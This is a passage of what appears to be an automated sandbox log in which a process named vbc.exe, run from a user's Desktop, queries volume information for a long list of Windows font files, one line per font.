        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\vbc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
